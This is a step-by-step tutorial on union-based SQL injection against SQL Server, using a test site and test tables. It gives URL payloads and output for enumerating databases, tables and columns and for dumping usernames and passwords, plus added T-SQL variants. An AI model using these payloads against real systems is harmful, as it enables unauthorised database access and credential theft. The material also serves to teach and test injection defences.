0x00 Overview
Applies when the page has a display position, i.e. a column of the query result that is rendered back into the page, so a UNION SELECT can put the value you want into that position (union-based injection on SQL Server).
0x01 Test data
1> select * from article;
2> go
+----+-----------+-----------+
| id | title     | content   |
+----+-----------+-----------+
| 1  | 测试标题  | 测试内容  |
| 2  | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# Test data in table users:
sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 1  | test-user-01 | 123456   |
| 2  | test-user-02 | 234567   |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1                |
+-----------------------+
| sa                    |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1                |
+-----------------------+
| test                  |
+-----------------------+
1 row in set (0.00 sec)
0x02 Finding the column count
Web request: http://www.test.com/sql.php?id=1 order by 3
Database query: select * from users where id=1 order by 3
# When the position is within range, the original row comes back unchanged:
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 1  | test-user-01 | 123456   |
+----+--------------+----------+
(1 rows affected)
# When the position is out of range, SQL Server raises an error:
sql server> select * from users where id=1 order by 4;
42000 - [SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
Increase the position until the error appears: the largest value that still succeeds is the column count (3 here), and every UNION SELECT in the following sections must supply exactly that many positions.
0x03 Dumping the current connection user
Web request: http://www.test.com/sql.php?id=-1 union select system_user,null,null
Database query: select * from users where id=-1 union select system_user,null,null
1> select * from users where id=-1 union select system_user,null,null;
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
| sa | null     | null      |
+----+----------+-----------+
(1 rows affected)
id=-1 matches no row, so the only row the page renders is the one produced by the UNION. Note that UNION converts every position to the highest-precedence data type among its inputs: putting system_user into the id position only works when id is a character column, as it evidently is in this test table. If id is an int column, SQL Server raises error 245 (Conversion failed when converting the nvarchar value 'sa' to data type int) and the value has to go into a character position such as username instead.
0x04 Dumping the current database
Web request: http://www.test.com/sql.php?id=-1 union select null,db_name(),null
Database query: select * from users where id=-1 union select null,db_name(),null
1> select * from users where id=-1 union select null,db_name(),null;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| null | test     | null      |
+------+----------+-----------+
(1 rows affected)
0x05 Dumping database names, method one
Note: db_name() takes a database id, so db_name(1), db_name(2), ... returns the other databases on the server one at a time; it returns NULL for an id that no database has.
For example:
db_name(1) gives database 1
db_name(2) gives database 2
Web request: http://www.test.com/sql.php?id=-1 union select null,db_name(1),null
Database query: select * from users where id=-1 union select null,db_name(1),null
# Database 1
1> select * from users where id=-1 union select null,db_name(1),null;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | master   | NULL      |
+------+----------+-----------+
(1 rows affected)
# Database 2
1> select * from users where id=-1 union select null,db_name(2),null;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | tempdb   | NULL      |
+------+----------+-----------+
(1 rows affected)
0x06 Dumping database names, method two
Advantage: simple.
Disadvantage: dbid values can have gaps (for example after a database is dropped), so a dbid you ask for may not exist. With dbid=N the request then returns nothing; with dbid>=N you get the next existing database and cannot tell a gap from a new entry. TOP 1 without an ORDER BY is also not guaranteed to pick the lowest matching dbid.
To query different databases, change the dbid condition, for example:
dbid>=1
dbid>=2
Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
Database query: select * from users where id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
# Database 1
1> select * from users where id=-1
   union select top 1 null, name, null from master.dbo.sysdatabases where dbid >= 1;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | master   | NULL      |
+------+----------+-----------+
(1 rows affected)
# Database 2
1> select * from users where id=-1
   union select top 1 null, name, null from master.dbo.sysdatabases where dbid >= 2;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | tempdb   | NULL      |
+------+----------+-----------+
(1 rows affected)
0x06 Dumping database names, method three
Advantage: every row_number value is guaranteed to exist, because ROW_NUMBER() numbers the result set 1..n with no gaps regardless of the underlying dbid values.
Note:
The dbid inside OVER(ORDER BY dbid) must be a column that exists in master.dbo.sysdatabases; it only defines the numbering order.
To query different databases, change the row_number condition, for example:
row_number=1
row_number=2
Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
Database query: select * from users where id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
# Database 1
1> select * from users where id=-1
   union select top 1 null, a.name, null
   from (select ROW_NUMBER() OVER (order by dbid) as row_number, name
         from master.dbo.sysdatabases) as a
   where row_number = 1;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | master   | NULL      |
+------+----------+-----------+
(1 rows affected)
# Database 2
1> select * from users where id=-1
   union select top 1 null, a.name, null
   from (select ROW_NUMBER() OVER (order by dbid) as row_number, name
         from master.dbo.sysdatabases) as a
   where row_number = 2;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | tempdb   | NULL      |
+------+----------+-----------+
(1 rows affected)
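All three methods above fetch one database name per request. The T-SQL below is an added example, not from the original page: it first counts the databases so you know how far to walk, then shows the gap-free row_number walk for an arbitrary N, and finally pulls the whole list in one request with FOR XML PATH when the display column is wide enough. It assumes the page's query shape (select * from users where id=<input>) and that the second display position, users.username, is a character column; everything after id= is the injected part.

```sql
-- Added example, not from the original page. Assumes the page's query shape
-- (select * from users where id=<input>) and that the second display position
-- (users.username) is a character column wide enough to show the result.

-- 1. How many databases are there? Tells you how far to walk row_number.
select * from users where id=-1
union select null, cast(count(*) as varchar(10)), null from master.dbo.sysdatabases

-- 2. Gap-free walk, one name per request (N = 3 here; try N = 1 .. count).
--    row_number() numbers the result 1..n with no holes, unlike dbid, which can
--    skip values after a database is dropped.
select * from users where id=-1
union select top 1 null, a.name, null
from (select row_number() over (order by dbid) as row_number, name
      from master.dbo.sysdatabases) as a
where a.row_number = 3

-- 3. Everything in one request: dbid:name pairs concatenated into one string
--    (FOR XML PATH('') is available from SQL Server 2005). The dbid makes gaps
--    visible; any '<' or '&' in a name comes back XML-escaped.
select * from users where id=-1
union select null,
  (select cast(dbid as varchar(10)) + ':' + name + ','
   from master.dbo.sysdatabases order by dbid for xml path('')),
  null
```

When these go into the URL after id=, encode every + as %2B (a bare + in a query string is decoded as a space, which breaks the string concatenation) and keep the single quotes intact.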
0x07 Dumping table names
Note:
The table_name inside OVER(ORDER BY table_name) must be a column that exists in information_schema.tables (which also lists views; add table_type='BASE TABLE' to skip them).
To query a different database:
table_catalog=db_name() (the current database)
information_schema views are scoped to the database you are connected to, so table_catalog='other database' returns nothing from here; to list another database's tables, query that database's own view with a three-part name, <database>.information_schema.tables.
To get different tables, change the row_number condition, for example:
row_number=1
row_number=2
Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
Database query: select * from users where id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
# Table 1
1> select * from users where id=-1
   union select top 1 null, a.table_name, null
   from (select ROW_NUMBER() OVER (order by table_name) as row_number, table_name
         from information_schema.tables where table_catalog = db_name()) as a
   where row_number = 1;
2> go
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | article  | NULL      |
+------+----------+-----------+
(1 rows affected)
# Table 2
1> select * from users where id=-1
   union select top 1 null, a.table_name, null
   from (select ROW_NUMBER() OVER (order by table_name) as row_number, table_name
         from information_schema.tables where table_catalog = db_name()) as a
   where row_number = 2;
2> go
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
| NULL | users    | NULL      |
+------+----------+-----------+
(1 rows affected)
0x08 Dumping column names
Note:
The column_name inside OVER(ORDER BY column_name) must be a column that exists in information_schema.columns. Ordering by column_name lists the columns alphabetically (id, password, username), not in the order the table declares them; order by ordinal_position to get the declared order.
To query a different table, change table_name, for example:
table_name='name of the table to query'
To get different columns, change the row_number condition, for example:
row_number=1
row_number=2
Web request: http://www.test.com/sql.php?id=-1 union select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1
Database query (run here without the union prefix, which is why the result header shows column_name): select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1
# First column name of table users in the current database
1> select top 1 null, a.column_name, null
   from (select ROW_NUMBER() OVER (order by column_name) as row_number, column_name
         from information_schema.columns
         where table_catalog = db_name() and table_name = 'users') as a
   where row_number = 1;
2> go
+------+-------------+------+
|      | column_name |      |
+------+-------------+------+
| NULL | id          | NULL |
+------+-------------+------+
(1 rows affected)
# Second column name of table users in the current database
1> select top 1 null, a.column_name, null
   from (select ROW_NUMBER() OVER (order by column_name) as row_number, column_name
         from information_schema.columns
         where table_catalog = db_name() and table_name = 'users') as a
   where row_number = 2;
2> go
+------+-------------+------+
|      | column_name |      |
+------+-------------+------+
| NULL | password    | NULL |
+------+-------------+------+
(1 rows affected)
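The two sections above walk tables and columns separately and, ordered by column_name, get the columns alphabetically. The T-SQL below is an added example, not from the original page: it walks every column of every table in the current database in declared order, with the schema, data type and length in the same display position, so you learn up front which positions will need a cast. It assumes the page's query shape (select * from users where id=<input>) with a character column in the second display position; the entry format is my own.

```sql
-- Added example, not from the original page. Assumes the page's query shape
-- (select * from users where id=<input>) and a character column in the second
-- display position. Runs against the information_schema views of the current
-- database, so it works without any setup.

-- 1. Total number of entries to walk.
select * from users where id=-1
union select null, cast(count(*) as varchar(10)), null
from information_schema.columns where table_catalog = db_name()

-- 2. Entry N (N = 4 here) in declared order: schema.table.column type(length).
--    ordinal_position gives the order select * returns the columns in;
--    character_maximum_length is NULL for non-character types (the isnull()
--    drops the parentheses then) and -1 for varchar(max)/nvarchar(max).
--    With the page's test schema N = 1..3 are the three article columns and
--    N = 4 is users.id.
select * from users where id=-1
union select top 1 null, a.entry, null
from (select row_number() over (order by c.table_schema, c.table_name, c.ordinal_position) as row_number,
             c.table_schema + '.' + c.table_name + '.' + c.column_name + ' ' + c.data_type
             + isnull('(' + cast(c.character_maximum_length as varchar(10)) + ')', '') as entry
      from information_schema.columns as c
      where c.table_catalog = db_name()) as a
where a.row_number = 4
```

Walk N = 1, 2, 3, ... until the request renders nothing; the count from the first query tells you where to stop. As in 0x07, information_schema.columns also covers view columns, and it only describes the database you are connected to.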
0x09 Dumping row contents
Note:
The username inside OVER(ORDER BY username) must be a column that exists in users; the numbering follows that order, so row_number=1 is the row with the alphabetically first username, not necessarily id 1.
To get different rows, change the row_number condition, for example:
row_number=1
row_number=2
Web request: http://www.test.com/sql.php?id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1
Database query: select * from users where id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1
# First row of table users
1> select * from users where id=-1
   union select a.id, a.username, a.password
   from (select ROW_NUMBER() OVER (order by username) as row_number, * from users) as a
   where row_number = 1;
2> go
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 1  | test-user-01 | 123456   |
+----+--------------+----------+
(1 rows affected)
# Second row of table users
1> select * from users where id=-1
   union select a.id, a.username, a.password
   from (select ROW_NUMBER() OVER (order by username) as row_number, * from users) as a
   where row_number = 2;
2> go
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 2  | test-user-02 | 234567   |
+----+--------------+----------+
(1 rows affected)
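The section above has as many display positions as users has columns, which is the easy case. The T-SQL below is an added example, not from the original page: it creates the users table from 0x01 in the current (test) database if it is missing, with column types that are my assumption (id is declared int here, which is exactly the case where system_user from 0x03 would have to go into a character position), then counts the rows, walks them over the primary key with every column packed into a single display position, and shows the OFFSET/FETCH alternative available from SQL Server 2012.

```sql
-- Added example, not from the original page. Creates the page's users table in
-- the current (test) database if it does not exist, with the rows from 0x01.
-- Column types are assumed; the page does not show them.
if object_id('dbo.users') is null
begin
    create table dbo.users (id int primary key, username varchar(50), password varchar(50));
    insert into dbo.users (id, username, password) values
        (1, 'test-user-01', '123456'),
        (2, 'test-user-02', '234567');
end;

-- 1. How many rows to walk.
select * from users where id=-1
union select null, cast(count(*) as varchar(10)), null from users

-- 2. Row N (N = 2 here) with every column packed into the one display position,
--    numbered over the primary key so the walk is stable. isnull() keeps a NULL
--    column from turning the whole packed string into NULL.
select * from users where id=-1
union select null, a.line, null
from (select row_number() over (order by id) as row_number,
             cast(id as varchar(10)) + '|' + isnull(username, '') + '|' + isnull(password, '') as line
      from users) as a
where a.row_number = 2

-- 3. The same row without ROW_NUMBER (SQL Server 2012+): skip N-1 rows, fetch
--    one. ORDER BY with OFFSET is only allowed inside a derived table here,
--    because an ORDER BY on the UNION member itself would apply to the whole union.
select * from users where id=-1
union select id, username, password
from (select id, username, password from users
      order by id offset 1 rows fetch next 1 rows only) as b
```

Query 2 is the form to use when the page shows fewer positions than the table has columns: one character position carries the whole row, and the '|' separators let you split it back apart. Query 3 returns the row in three positions like the page's own query, but without the derived-table numbering.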
